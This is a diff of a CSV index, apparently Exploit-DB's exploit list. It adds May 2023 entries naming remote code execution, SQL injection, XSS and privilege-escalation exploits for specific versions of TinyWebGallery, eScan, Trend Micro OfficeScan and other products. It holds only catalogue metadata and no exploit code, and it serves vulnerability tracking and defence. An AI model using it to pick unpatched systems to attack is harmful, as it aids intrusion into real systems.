 25189,exploits/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion",2005-03-04,"Filip Groszynski",webapps,php,,2005-03-04,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12726/info
 25192,exploits/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,webapps,php,,2005-03-05,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12735/info
 36031,exploits/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",webapps,php,,2015-02-09,2015-02-09,0,,,,,,
@@ -30516,6 +30543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9674,exploits/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,webapps,php,,2009-09-14,,1,OSVDB-58249,,,,,
 47814,exploits/php/webapps/47814.txt,"Thrive Smart Home 1.1 - Authentication Bypass",2019-12-30,LiquidWorm,webapps,php,,2019-12-30,2019-12-30,0,,,,,,
 47583,exploits/php/webapps/47583.txt,"thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting",2019-11-05,cakes,webapps,php,80,2019-11-05,2019-11-05,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comMillhouse-Project-master.zip,
+51450,exploits/php/webapps/51450.php,"thrsrossi Millhouse-Project 1.414 - Remote Code Execution",2023-05-23,"Chokri Hammedi",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 27687,exploits/php/webapps/27687.txt,"ThWboard 2.8 - 'showtopic.php' SQL Injection",2006-04-19,Qex,webapps,php,,2006-04-19,2013-08-19,1,CVE-2006-1926;OSVDB-27435,,,,,https://www.securityfocus.com/bid/17606/info
 27711,exploits/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",webapps,php,,2006-04-20,2013-08-20,1,CVE-2006-2037;OSVDB-25210,,,,,https://www.securityfocus.com/bid/17627/info
 3124,exploits/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,webapps,php,,2007-01-13,2016-09-21,1,OSVDB-32837;CVE-2007-0340,,,,http://www.exploit-db.comthwb-300-beta-2.84-php5.tar.gz,
@@ -30661,6 +30689,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16090,exploits/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",webapps,php,,2011-02-01,2012-06-22,0,OSVDB-70743,,,,http://www.exploit-db.comtwg183.zip,
 18322,exploits/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,webapps,php,,2012-01-06,2012-01-06,0,OSVDB-82603;OSVDB-82481;CVE-2012-5347,,,,,
 36094,exploits/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,webapps,php,,2011-08-31,2015-02-16,1,,,,,,https://www.securityfocus.com/bid/49393/info
+51443,exploits/php/webapps/51443.txt,"TinyWebGallery v2.5 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 51442,exploits/php/webapps/51442.txt,"TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)",2023-05-13,"Mirabbas Ağalarov",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
 5947,exploits/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' SQL Injection",2008-06-26,InjEctOr5,webapps,php,,2008-06-25,2016-12-09,1,OSVDB-46526;CVE-2008-5168,,,,,
 23322,exploits/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,webapps,php,,2012-12-12,2012-12-12,0,OSVDB-88394;OSVDB-88393,,,,http://www.exploit-db.comTipsOfTheDay.zip,
@@ -31785,6 +31814,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php,,2007-03-14,,1,OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481,,,,,
 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,,
 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,,
+51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,,
 43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,,
 44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,,2018-05-21,2018-05-22,0,,,,,,
@@ -32015,6 +32045,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22812,exploits/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",webapps,php,,2003-06-20,2012-11-18,1,,,,,,https://www.securityfocus.com/bid/7995/info
 3717,exploits/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,webapps,php,,2007-04-11,,1,OSVDB-35747;CVE-2007-2307,,,,,
 38024,exploits/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",webapps,php,,2012-07-19,2015-08-31,1,CVE-2012-5851;OSVDB-87521,,,,,https://www.securityfocus.com/bid/56570/info
+51465,exploits/php/webapps/51465.txt,"Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)",2023-05-23,"Astik Rawat",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-30256,,,,,
 9164,exploits/php/webapps/9164.txt,"webLeague 2.2.0 - 'install.php' Remote Change Password",2009-07-16,TiGeR-Dz,webapps,php,,2009-07-15,,1,,,,,,
 9162,exploits/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,webapps,php,,2009-07-14,,1,OSVDB-61553;CVE-2009-4560,,,,,
 9165,exploits/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,webapps,php,,2009-07-15,,1,OSVDB-61554;CVE-2009-4561,,,,,
@@ -32512,6 +32543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19524,exploits/php/webapps/19524.txt,"WordPress Plugin Backup 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",webapps,php,,2012-07-02,2012-07-04,1,OSVDB-83701,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt20000/backup.png,http://www.exploit-db.combackup.2.0.1.zip,
 50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",2021-11-08,"Murat DEMİRCİ",webapps,php,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.combackup-and-restore-for-wp.1.0.3.zip,
 50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",2021-07-05,"Ron Jost",webapps,php,,2021-07-05,2021-07-05,0,CVE-2021-24155,,,,http://www.exploit-db.combackup.1.5.8.zip,
+51445,exploits/php/webapps/51445.txt,"WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup",2023-05-23,Wadeek,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 4593,exploits/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,webapps,php,,2007-10-31,,1,OSVDB-38479;CVE-2007-5800;OSVDB-38478;OSVDB-38477;OSVDB-38476,"WordPress Plugin",,,,
 17056,exploits/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution",2011-03-28,"Sense of Security",webapps,php,,2011-03-28,2011-03-28,0,OSVDB-71481;CVE-2011-4342,"WordPress Plugin",,,,http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf
 35400,exploits/php/webapps/35400.txt,"WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",webapps,php,,2011-02-28,2014-11-30,1,,,,,,https://www.securityfocus.com/bid/46610/info
@@ -34481,6 +34513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
 45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
 45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
+51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
 46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
 41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
 40236,exploits/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,webapps,ruby,80,2016-08-15,2016-08-15,0,CVE-2016-4340,,,,,
@@ -39960,6 +39993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32205,exploits/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,local,windows,,2014-03-12,2014-03-12,0,OSVDB-104323;CVE-2014-3222,,,,,http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-329170.htm
 21988,exploits/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode (SEH)",2012-10-15,Dark-Puzzle,local,windows,,2012-10-15,2012-10-15,0,OSVDB-87008;CVE-2012-6568,,,,,
 40807,exploits/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",local,windows,,2016-11-22,2016-11-22,1,CVE-2016-8769,,,,,
+51461,exploits/windows/local/51461.txt,"Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking",2023-05-23,"Ahsan Azad",local,windows,,2023-05-23,2023-05-23,0,,,,,,
 35177,exploits/windows/local/35177.py,"i-FTP 2.20 - Local Buffer Overflow (SEH)",2014-11-06,metacom,local,windows,,2014-11-06,2016-10-10,1,OSVDB-114279,,,,http://www.exploit-db.comiftp-win32-v220.exe,
 35671,exploits/windows/local/35671.rb,"i-FTP Schedule - Local Buffer Overflow (Metasploit)",2015-01-01,Metasploit,local,windows,,2015-01-01,2015-01-01,1,OSVDB-114279,"Metasploit Framework (MSF)",,,http://www.exploit-db.comiftp-win32-v220.exe,
 35040,exploits/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous",local,windows,,2014-10-22,2014-10-22,0,CVE-2014-5507;OSVDB-113675,,,,,
@@ -40700,6 +40734,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18657,exploits/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",local,windows,,2012-03-23,2012-05-27,1,OSVDB-80532,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-27-at-21851-pm.png,http://www.exploit-db.commmplayer.zip,
 47429,exploits/windows/local/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",local,windows,,2019-09-27,2019-10-03,0,,,,,,
 47667,exploits/windows/local/47667.txt,"MobileGo 8.5.0 - Insecure File Permissions",2019-11-18,ZwX,local,windows,,2019-11-18,2019-11-18,0,,,,,,
+51479,exploits/windows/local/51479.txt,"MobileTrans  4.0.11 - Weak Service Privilege Escalation",2023-05-23,"Thurein Soe",local,windows,,2023-05-23,2023-05-23,0,CVE-2023-31748,,,,,
 36053,exploits/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (1)",2015-02-11,"dogo h@ck",local,windows,,2015-02-11,2015-02-11,0,OSVDB-118128,,,,http://www.exploit-db.commooplayer-1.3.0.zip,
 36819,exploits/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",local,windows,,2015-04-22,2015-04-22,1,OSVDB-118128,,,http://www.exploit-db.com/screenshots/idlt37000/screen-shot-2015-04-22-at-70835-pm.png,http://www.exploit-db.commooplayer-1.3.0.zip,
 13942,exploits/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,local,windows,,2010-06-19,,1,CVE-2010-2439;OSVDB-65789,,,http://www.exploit-db.com/screenshots/idlt14000/13942.png,http://www.exploit-db.comMoreAmp-0.1.25-binWin.zip,
@@ -41313,6 +41348,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47940,exploits/windows/local/47940.txt,"Trend Micro Maximum Security 2019 - Arbitrary Code Execution",2020-01-17,hyp3rlinx,local,windows,,2020-01-17,2020-01-17,0,,,,,,
 47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows,,2020-01-17,2020-01-17,0,,,,,,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,,2017-09-28,2017-09-28,1,,,,,,
+51453,exploits/windows/local/51453.txt,"Trend Micro OfficeScan Client 10.0 - ACL Service LPE",2023-05-23,msd0pe,local,windows,,2023-05-23,2023-05-23,0,,,,,,
 15376,exploits/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel",2010-11-01,"Nikita Tarakanov",local,windows,,2010-11-01,2010-11-12,1,OSVDB-69018,,,,http://www.exploit-db.comTrend_Micro.exe,
 44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows,,2018-06-08,2018-06-08,1,CVE-2018-10507,,,,,
 50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",2022-01-05,"Yehia Elghaly",local,windows,,2022-01-05,2022-01-05,0,,,,,http://www.exploit-db.comRemote_System_monitor_Server_3.61_x86_Setup.exe,
@@ -45332,6 +45368,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42154,exploits/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",webapps,windows,,2017-06-11,2017-06-11,1,,,,http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2017-06-11-at-112909.png,http://www.exploit-db.comecssetup.exe,
 47811,exploits/windows/webapps/47811.txt,"elearning-script 1.0 - Authentication Bypass",2019-12-30,riamloo,webapps,windows,,2019-12-30,2019-12-30,0,,,,,,
 20349,exploits/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2591;OSVDB-84520,,,http://www.exploit-db.com/screenshots/idlt20500/emailarchitect-payload-0.png,,
+51467,exploits/windows/webapps/51467.txt,"eScan Management Console 14.0.1400.2281 - Cross Site Scripting",2023-05-23,"Sahil Ojha",webapps,windows,,2023-05-23,2023-05-23,0,CVE-2023-31703,,,,,
+51466,exploits/windows/webapps/51466.txt,"eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)",2023-05-23,"Sahil Ojha",webapps,windows,,2023-05-23,2023-05-23,0,CVE-2023-31702,,,,,
 20350,exploits/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2590;OSVDB-84747,,,http://www.exploit-db.com/screenshots/idlt20500/supportportal-payload-0.png,,
 45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,,2018-09-03,2018-09-03,0,CVE-2018-16252,"XML External Entity (XXE)",,,http://www.exploit-db.comelex_setup.exe,
 38379,exploits/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,webapps,windows,,2015-10-02,2015-10-02,0,OSVDB-128434;OSVDB-128433;OSVDB-128432,,,,,http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt